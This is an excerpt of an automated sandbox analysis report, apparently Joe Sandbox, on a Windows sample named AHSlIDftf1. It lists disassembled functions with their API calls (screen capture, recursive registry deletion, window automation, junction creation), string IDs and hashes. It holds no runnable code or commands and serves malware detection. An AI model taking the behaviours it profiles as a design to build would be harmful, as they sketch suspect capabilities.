                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 146587525-4033151799
                                                                                                            • Opcode ID: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
                                                                                                            • Instruction ID: cd7475fd6aa65e107629135cc9d17417f384536d3ade970c6222d959118ed7eb
                                                                                                            • Opcode Fuzzy Hash: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
                                                                                                            • Instruction Fuzzy Hash: 63C17D34204341EFD714DF14C495F2ABBE5EF84318F59855EE89A8B3A2CB31E846CBA1
                                                                                                            Function 00DD255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 00DD25D8
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DD25E8
                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00DD25F4
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00DD2601
                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DD266D
                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DD26AC
                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DD26D0
                                                                                                            • SelectObject.GDI32(?,?), ref: 00DD26D8
                                                                                                            • DeleteObject.GDI32(?), ref: 00DD26E1
                                                                                                            • DeleteDC.GDI32(?), ref: 00DD26E8
                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00DD26F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                            • Opcode ID: a23c8bf66785d7d02321d212d9a6785cf2d01e3b9706e79e0d67309ea36332f9
                                                                                                            • Instruction ID: 6d04c249ba304fbc6b4ee9b0e97eb5a43f67aaa95aa962a9c42c4cd01a3597f3
                                                                                                            • Opcode Fuzzy Hash: a23c8bf66785d7d02321d212d9a6785cf2d01e3b9706e79e0d67309ea36332f9
                                                                                                            • Instruction Fuzzy Hash: 6661E175D00319EFCF15DFA8D884AAEBBB5FF48310F20852AE955A7350D770A9418F60
                                                                                                            Function 00D8DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00D8DAA1
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D659
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D66B
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D67D
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D68F
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6A1
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6B3
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6C5
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6D7
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6E9
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6FB
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D70D
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D71F
                                                                                                              • Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D731
                                                                                                            • _free.LIBCMT ref: 00D8DA96
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D8DAB8
                                                                                                            • _free.LIBCMT ref: 00D8DACD
                                                                                                            • _free.LIBCMT ref: 00D8DAD8
                                                                                                            • _free.LIBCMT ref: 00D8DAFA
                                                                                                            • _free.LIBCMT ref: 00D8DB0D
                                                                                                            • _free.LIBCMT ref: 00D8DB1B
                                                                                                            • _free.LIBCMT ref: 00D8DB26
                                                                                                            • _free.LIBCMT ref: 00D8DB5E
                                                                                                            • _free.LIBCMT ref: 00D8DB65
                                                                                                            • _free.LIBCMT ref: 00D8DB82
                                                                                                            • _free.LIBCMT ref: 00D8DB9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
                                                                                                            • Instruction ID: 4663ce9ab6671a7762158068c22d0712a2c8336ae04780a9d9feb7a52c0ce7aa
                                                                                                            • Opcode Fuzzy Hash: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
                                                                                                            • Instruction Fuzzy Hash: 67311931644605AFEB25BA39E845B6A77EAFF10320F2A4419E459D71D1DF35AC808B30
                                                                                                            Function 00DB365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00DB369C
                                                                                                            • _wcslen.LIBCMT ref: 00DB36A7
                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DB3797
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB380C
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00DB385D
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB3882
                                                                                                            • GetParent.USER32(?), ref: 00DB38A0
                                                                                                            • ScreenToClient.USER32(00000000), ref: 00DB38A7
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00DB3921
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB395D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                            • String ID: %s%u
                                                                                                            • API String ID: 4010501982-679674701
                                                                                                            • Opcode ID: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
                                                                                                            • Instruction ID: 2610b47ec48a88feef19fcedc728f00ac5a7fd16f4751f2368615ef1818250d7
                                                                                                            • Opcode Fuzzy Hash: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
                                                                                                            • Instruction Fuzzy Hash: E891A171204706EFDB19DF24C885BEAB7A8FF44350F048529F99AC6190EB30EA45DBB1
                                                                                                            Function 00DB4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB4994
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB49DA
                                                                                                            • _wcslen.LIBCMT ref: 00DB49EB
                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00DB49F7
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00DB4A2C
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4A64
                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00DB4A9D
                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4AE6
                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00DB4B20
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DB4B8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                            • String ID: ThumbnailClass
                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                            • Opcode ID: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
                                                                                                            • Instruction ID: f152069514a3bb2cc6f81f89fb982818890377fc762d17c59cc876c3288580d8
                                                                                                            • Opcode Fuzzy Hash: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
                                                                                                            • Instruction Fuzzy Hash: AF919E71104305DBDB04DF14C981BEABBA8EF44714F08846DFE869A196EB30ED45CBB5
                                                                                                            Function 00DDCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCC64
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DDCC8D
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD48
                                                                                                              • Part of subcall function 00DDCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DDCCAA
                                                                                                              • Part of subcall function 00DDCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DDCCBD
                                                                                                              • Part of subcall function 00DDCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDCCCF
                                                                                                              • Part of subcall function 00DDCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD05
                                                                                                              • Part of subcall function 00DDCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCD28
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDCCF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                            • Opcode ID: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
                                                                                                            • Instruction ID: ed417215a2b9626c425b72efe188acb011271bc9b4ad0dde377535a5ea80ec84
                                                                                                            • Opcode Fuzzy Hash: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
                                                                                                            • Instruction Fuzzy Hash: EC316F7192122ABBDB209B94DC88EFFBB7CEF45750F041166F905E6340DB349A46DAB0
                                                                                                            Function 00DC3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DC3D40
                                                                                                            • _wcslen.LIBCMT ref: 00DC3D6D
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DC3D9D
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DC3DBE
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00DC3DCE
                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DC3E55
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DC3E60
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DC3E6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                            • String ID: :$\$\??\%s
                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                            • Opcode ID: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
                                                                                                            • Instruction ID: 922450b68dc2fd51c952919b7845ed551e3a94dc043b37e145bda468626b9717
                                                                                                            • Opcode Fuzzy Hash: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
                                                                                                            • Instruction Fuzzy Hash: 2631A57191024AABDB21EBA0DC89FEF37BCEF89700F5481A9F609D6150E77097458B34
                                                                                                            Function 00DBE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • timeGetTime.WINMM ref: 00DBE6B4
                                                                                                              • Part of subcall function 00D6E551: timeGetTime.WINMM(?,?,00DBE6D4), ref: 00D6E555
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00DBE6E1
                                                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DBE705
                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DBE727
                                                                                                            • SetActiveWindow.USER32 ref: 00DBE746
                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DBE754
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DBE773
                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00DBE77E
                                                                                                            • IsWindow.USER32 ref: 00DBE78A
                                                                                                            • EndDialog.USER32(00000000), ref: 00DBE79B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                            • String ID: BUTTON
                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                            • Opcode ID: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
                                                                                                            • Instruction ID: 48a957551b817ffc44497526e8238b4ac5ff4c2ec64cf9a8a1ae7c747ef77978
                                                                                                            • Opcode Fuzzy Hash: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
                                                                                                            • Instruction Fuzzy Hash: CC218771210344FFEB106F22ECC9EA63B69FB55348B142429F516E63B1DB719C0A9A74
                                                                                                            Function 00DBE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DBEA5D
                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DBEA73
                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBEA84
                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DBEA96
                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DBEAA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: SendString$_wcslen
                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                            • Opcode ID: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
                                                                                                            • Instruction ID: 05f004a10b1ea2cc7b0069acf3c6144617da2604885c1b4c29d32583d2eb413d
                                                                                                            • Opcode Fuzzy Hash: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
                                                                                                            • Instruction Fuzzy Hash: B7117331A50359BADB20A7A6DC4ADFF6B7CEFD1B40F4414297C11A20D1EE705989C9B0
                                                                                                            Function 00DB5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00DB5CE2
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DB5CFB
                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DB5D59
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00DB5D69
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DB5D7B
                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DB5DCF
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00DB5DDD
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DB5DEF
                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DB5E31
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00DB5E44
                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DB5E5A
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DB5E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3096461208-0
                                                                                                            • Opcode ID: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
                                                                                                            • Instruction ID: 97e230e370a8d62748e50d93d2e7f54cffc078fb2c66e71e7cf5d87be0e6d76b
                                                                                                            • Opcode Fuzzy Hash: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
                                                                                                            • Instruction Fuzzy Hash: C5511C70A10705AFDF18DF68DD89BAEBBB5EB48300F548229F916E6294D7709E01CB60
                                                                                                            Function 00D68BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5
                                                                                                            • DestroyWindow.USER32(?), ref: 00D68C81
                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68D1B
                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00DA6973
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69A1
                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69B8
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000), ref: 00DA69D4
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DA69E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 641708696-0
                                                                                                            • Opcode ID: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
                                                                                                            • Instruction ID: 0f83f3d7af1a5f5448741cd58435a179dcf9ef8d763d683bc5a4cd0b29713c74
                                                                                                            • Opcode Fuzzy Hash: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
                                                                                                            • Instruction Fuzzy Hash: 14619C31502700DFCB359F25C998B2677F1FB95312F194658E082AA660CB31E9D6EFB1
                                                                                                            Function 00D69838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00D69862
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
